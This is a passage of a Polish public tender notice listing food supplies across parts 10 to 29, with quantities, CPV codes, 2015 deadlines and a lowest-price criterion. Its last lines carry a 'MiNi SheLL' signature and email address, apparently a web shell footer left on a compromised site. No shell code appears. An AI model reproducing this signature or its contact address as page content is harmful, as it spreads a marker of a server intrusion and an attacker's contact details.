kiełbasa biała parzona	kg	5
kiełbasa biała  surowa	kg	5
kiełbasa codzienna lub równowazna	kg	10
kiełbasa golonkowa	kg	20
kiełbasa śląska lub równowazna	kg	10
kiełbasa toruńska lub równowazna	kg	40
kiełbasa typu ogniskowa lub równoważna	kg	40
kiełbasa piwna	kg	15
kiełbasa szynkowa	kg	3
kiełbasa zwyczajna	kg	10
kiełbasa z weka lub równoważna	kg	20
krakowska	kg	3
metka cebulowa	szt	10
metka łososiowa	kg	30
metka inna typu wiejska lub równowazna	kg	10
mielonka  wędlina	kg	30
mielonka z warzywami	kg	10
mielonka śniadaniowa lub równowazna	kg	40
mortadela	kg	5
ogonówka	kg	5
parówka hot-dog drobiowa	kg	10
parówka foli	kg	5
parówka	kg	60
pasztetowa 	kg	20
pasztetowa  śmietankowa lub równowazna	kg	20
pasztet drobiowy	kg	20
pierś z kurczaka wędlina	kg	3
polędwica drobiowa	kg	20
polędwica drobiowa lux	kg	5
polędwica sopocka drobiowalub równowazna	kg	5
polędwica indyk	kg	10
polędwica wieprz.(wędlina)	kg	1
przysmak w konserwie lub równowazny	kg	30
salami	kg	3
serdelki	kg	15
smaczek konserwowy lub równowazny	kg	30
szynka drobiowa	kg	15
szynka mielona	kg	25
szynka konserwowa	kg	5
szynka tostowa	kg	5
Szynkowa	kg	15
szynka typu szynka żołnierska lub równowazna	kg	20
szynka z warzywami	kg	15
szynkówka kiełbasa	kg	10
tyrolska lub równowazna	kg	10
wędlina z warzywami	kg	30
żywiecka	kg	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.30-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zadanie	10. pasztety i konserwy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> gulasz angielski 120g	szt	60
pasztet131 g koperek/majer./papryka/pieczar/pomid	szt	120
przysmak śniadaniowy 130g	szt	60
przysmak śniadaniowy 300g	szt	20
turystyczna  135g	szt	60
turystyczna 300g	szt	20
tyrolska 135g	szt	60
tyrolska 300g	szt	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.10.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zadanie	11. ryby i przetwory.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> filet z mintaja	kg	30
matijas	kg	20
paluszki rybne	kg	15
panga	kg	20
paprykarz szczeciński 156g	szt	35
szprot w pomidorach 170-180g	szt	35
tunczyk w oleju 170-180 g	szt	35
śledź świeży filet	kg	10
śledź w pomidorach 170-180g	szt	35.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zadanie	12. pieczywo i ciasto.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> chleb krojony pszenny 0,6 kg	szt	3000
ciastka drożdżowe 100g	szt	35
ciasta różne	kg	5
bułki pszenne100g	szt	70
bułki 50g	szt	1000
bułki hamburger	szt	35
rogal 100g	szt	35
pączki 70g	szt	70
ciastka francuskie 60 g	szt	70.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Zadanie	13. produkty skrobi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> kasza manna	kg	40
kasza jęczm. drobna	kg	5
kasza jęczm. Średnia	kg	50
kasza pęczak	kg	20
mąka pszenna typu 500	kg	20
mąka pszenna typu 450	kg	140
mąka ziemiaczna	kg	40
płatki owsiane  0,5 kg	kg	20
płatki kukurydz. 250G	szt	20
platki kukur. 500 g	szt	50
platki kuku.kakaowe 250g	szt	20
platki kukur.kuleczki  500g	szt	50
płatki  kukurydziane z rodzynkami itp.250-300g	szt	10
ryż 4*100g	szt	10
ryż 1kg	kg	70.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Zadanie	14 produkty spożywcze różne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> baton 55/90g	szt	35
baton 60/90g	szt	35
barszcz biały 60/90g	szt	20
barszcz czerwony 220ml	szt	10
budyń 60/75g	szt	50
bułka tarta 400-500g	szt	60
chrupki kukurydziane 80/130g	szt	45
ciastka w polewie	kg	2
ciastka kruche	kg	2
ciastka typy pierniki	kg	2
ciastka typu wafelki	kg	4
Ciastka-rolada  200/300g	szt	3
cukier	kg	180
cukier puder  400g	szt	10
cukier waniliowy 15/20g	szt	40
cukierki czekoladowe	kg	2
cukierki typu krówki	kg	2
cukierki typu szklaki	kg	2
cukierki owocowe	kg	2
cynamon 15/20g	szt	20
czekolada z orzechami 100g	szt	15
czekolada mleczna 100g	szt	20
czipsy 100/130g	szt	35
drożdże 100g	szt	20
galaretka owocowa 70/90g	szt	50
herbata expres 100 szt	szt	40
herbata expres 40 szt	szt	5
herbata expr. Mietowa 25szt	szt	2
hebata expres owocowa 25szt	szt	2
herbata granulowana 100g	szt	2
herbata owoc.rozpusz gran.100g	szt	5
herbata zielona expre25szt	szt	2
jarzynka 200g	szt	30
Jarzynka 0,5 kg	szt	12
Kawa zboż-expr.35szt	szt	10
kawa rozpuszczalna zboż 200g	szt	10
kawa rozpusz.naturalna100g	szt	2
kawa typy capucino  lub równoważna 110/125g	szt	3
kawa naturalna mielona 500g lub równoważna	szt	3
kakao rozpuszczalne 150-300g	szt	40
keczup 500g	szt	50
kisiel  35/50g	szt	65
kminek 20g	szt	25
krem czekoladowy 200/250g	szt	200
krem czekoladowy 400g	szt	20
krem czekolad.orzechowy 200/350g	szt	20
kwasek cytrynowy 15/20g	szt	90
liść laurowy 20g	szt	25
lizak kulka 15g	szt	35
lizak 12/15g	szt	35
lizak typu serduszko 12/20g	szt	35
magi w plynie 1 l	szt	6
mak -puszka 500g	szt	3
makaron nitki  0.5 kg	szt	20
makaron gniazda 1kg	szt	20
makar. gniaz. 400g 	szt	30
makaron łazanka  400/500g	szt	30
makaron rurki 1 kg	szt	10
makaron paczka 400/500g	szt	20
makaron świderki 0,5kg typu lubella	szt	20
makaron świderki 1kg	szt	30
makaron spagetti 0,5kg	szt	30
makaron zacierka 200/ 250g	szt	40
majeranek 20g	szt	40
majeranek 150g	szt	10
majonez   700g  do sałatek	szt	10
majonez 900g  do sałatek	szt	30
mikołaj czekoladowy 30/60g	szt	45
miód sztuczny sloik 200/250g	szt	20
miód sztuczny 	kg	1
Miód naturalny słoik 200/250g	szt	5
musztarda  165/190g	szt	40
Ocet 10% 500ml.	szt	50
paluszki solone 70g	szt	35
paluszki -cebulowe,kminkowe, paprykowe itp.70g	szt	35
papryka mielona 20g	szt	50
pieprz mielony 20g	szt	100
pieprz w ziarnkach 20g	szt	10
pieprz ziolowy 20g	szt	25
polewa do lodów 200g	szt	5
proszek do pieczenia 25-,30 g	szt	30
przyprawa gyros 20g	szt	20
przyprawa do bigosu 0,3	szt	25
przyprawa do grilla 20g	szt	30
przyprawa do kurczaka 25-30g	szt	60
przyprawa do ryb 20g	szt	40
rosół drobiowy słoik 125/190g	szt	10
rosół drobiowy kost. 60/120g	szt	10
soda spożywcza 80g	szt	5
sos chili 200/250	szt	10
sos czosnkowy 220-250ml	szt	10
sos do deserów 1 l	szt	5
sos do hamburgerow 880g	szt	3
sos do spagetti słoik  450-500g	szt	12
sos mix koper-zioł, włoski itp.9g	szt	60
sos słodko-kwaśny  500g	szt	30
sos sojowy 600/1000l	szt	5
sól	kg	60
sól peklowa	szt	4
wafelek duży(wafel z kremem typu murzynek) 55/60g	szt	35
wafelek mały(wafel z kremem typu murzynek) 35/55g	szt	35
wafelek w polewie 50g	szt	35
wafelek b/polewy typu grzesiek 39g	szt	35
warzywko 200g	szt	30
warzywko 500g	szt	10
Warzywko 1 kg	szt	5
wiórki kokosowe 25g	szt	10
zestaw świateczny (np.czelolada, baton, mikołaj)250g	szt	30
zestaw świąeczny(np. Czekolada, zajączek, baton)	szt	30
ziele angielskie 60g	szt	25
zupki typu chińska(ostra,łagodna rosołowa itp.) 70g	szt	15
zupki typu chiska(rosołowa-ostra/lagodna,krabowa itp.)	szt	20
zelatyna 45- 50g	szt	30
żurek w butelce  350-500	szt	20
zurek w proszku 60/90g	szt	40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Zadanie	15 oleje i tłuszcze roślinne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> margaryna z masłem 0,5 kg	szt	650
margaryna  0,5 kg	szt	60
masło roślinne 200g	szt	20
oliwa z oliwek 1 l	szt	2
olej 1l	szt	190
smalec	kg	2
smalec 200g	szt	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.41.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Zadanie	16 produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Deser mleczny/owocowy  120-150g	szt	200
deser 6x 55g	opk	50
jogurt pitny100- 150g	szt	200
jogurt  ze zbożami/musli 150g	szt	100
jogurt 150g	szt	600
jogurt 110-150g	szt	600
masło  200G	szt	10
Mleko UHT 2% 1l	szt	100
Mleko UHT 3,2% 1l	szt	300
serek grani 0,180-0,2	szt	45
serek homogenizowany 125-150g	szt	90
serek kanapk. twarożk. 120-220G	szt	80
ser twarogowy 200-250g	szt	45
set topiony kostka100g	szt	180
ser topiony -kiełbaski 100g	szt	180
ser top. Zegar200g	szt	45
ser topiony zegar 140-160g	kg	45
ser wędzony	kg	10
ser edamski	kg	6
ser gouda	kg	6
ser kaszub	kg	3
ser królewski	kg	3
ser morski	kg	6
ser salami	kg	10
śmietanka 18% 0,2-0,5 l	szt	60
śmietanka 30% 0,2- 0,5 l	szt	60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Zadanie	17 napoje.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> napoje gazowane 1,5 l	szt	45
napoje niegazowane 1,5 l	szt	45
napój gazowany 2l	szt	10
napój n/g 2 l	szt	10
napój energet 0,2-0,3 l	szt	45
woda mineralna 0,5 gaz	szt	90
woda 0,5 n/g	szt	90
woda mineralna n/g 1,5 l	szt	45
woda mineralna g 1,5 l	szt	45.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.90.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Zadanie	18. owoce świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> cytryny	kg	6
jabłka	kg	6
pomarańcze	kg	6
śliwki węgierki	kg	6
truskawki	kg	6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Zadanie	19. owoce przetworzone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ananas konserwowy 400/500g	szt	6
brzoskwinie konserwowe 0,9	szt	6
rodzynki 100g	szt	6
orzechy włoskie	kg	6
śliwki suszone 180/270g	szt	6
sok malinowy	litry	4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Zadanie	20. warzywa świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> brokuły 1kg	szt	6
buraki	kg	6
cebula	kg	6
czosnek	kg	1
fasola jaś	kg	3
fasola szparagowa	kg	6
groch 	kg	3
kalafior 1kg.	szt	6
kapusta biała	kg	12
kapusta czerwona	kg	6
kapusta pekińska	szt	6
koper	szt	6
marchew	kg	12
natka pietruszki	szt	6
ogórek świeży	kg	6
papryka świeża	kg	6
pieczarki	kg	6
pietruszka	kg	6
pomidor	kg	6
por	kg	6
sałata zielona	szt	6
seler	kg	6
ziemniaki	kg	18.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Zadanie	21. warzywa przetworzone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> czerwona fasola 400-460	szt	6
groszek konserwowy 400g	szt	6
kapusta kiszona	kg	6
koncentrat buraczany 200/220 ml	szt	6
koncentrat pomidorowy 0,9l	szt	6
kukurydza konserwowa 400/450	szt	6
ogórek kiszony	kg	6
ogórek konserwowy 0,9l	szt	6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Zadanie	22. jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> jaja	szt	180.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> Zadanie	23. mięso i produkty mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> boczek	kg	3
karkówka	kg	6
golonka wieperzowa	kg	6
łopatka	kg	12
schab świeży	kg	3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.90.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> Zadanie	24. ryby i przetwory.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> panga	kg	6
filety śledzowe sol.	kg	6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> Zadanie	25. produkty skrobi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> kasza gryczana	kg	6
kasza manna	kg	6
mąka pszenna 450	kg	18
mąka ziemniaczana	kg	6
ryż 4 x 100	szt	6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 26 <b>NAZWA:</b> Zadanie	26 produkty spożywcze różne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> bazylia (paczka 20g)	szt	6
budyń śmietankowy 60/75g	szt	12
bułka tarta 400g	szt	12
cukier	kg	12
galaretka owocowa 70/90g	szt	18
kisiel 35/50g	szt	12
kostki rozosłowe (bulion 60g/120)	szt	12
kwasek cytrynowy15/ 20g 	szt	6
liść laurowy (paczka 12/20 g)	szt	6
magii 1l	szt	2
majeranek (paczka 20g)	szt	6
majonez 700g	szt	6
makaron	kg	12
musztarda stołowa 165/190g.	szt	6
papryka mielona słodka            (paczka 20g)	szt	18
pieprz (paczka 20g)	szt	17
przyprawa do kurczaka (paczka 25/30g)	szt	18
przyprawa do mięsa (paczka 20g)	szt	18
sól	kg	6
tymianek (paczka 20 g)	szt	6
wegeta ( paczka 200g)	szt	6
ziele angielskie (paczka 15g)	szt	6
żelatyna (paczka25/ 50 g)	szt	6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 27 <b>NAZWA:</b> Zadanie	27 oleje i tłuszcze roślinne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> olej	litry	15.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.43.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 28 <b>NAZWA:</b> Zadanie	28 produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> masło ( kostka )	szt	6
mleko 3,2% UHT	litry	6
ser twarogowy 200-250g	szt	6
ser feta 	szt	6
ser żółty	kg	3
Śmietana 30%  0,5 l	szt	6
Śmietana 18% 0,5 l	szt	6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 29 <b>NAZWA:</b> Zadanie	29. drób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> filet z piersi kurczaka	kg	12
korpus drobiowy	kg	12
kurczak   ( szt )	kg	12
udko z kurczaka 	kg	18
wątróbka drobiowa	kg	6
żołądki drobiowe	kg	6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com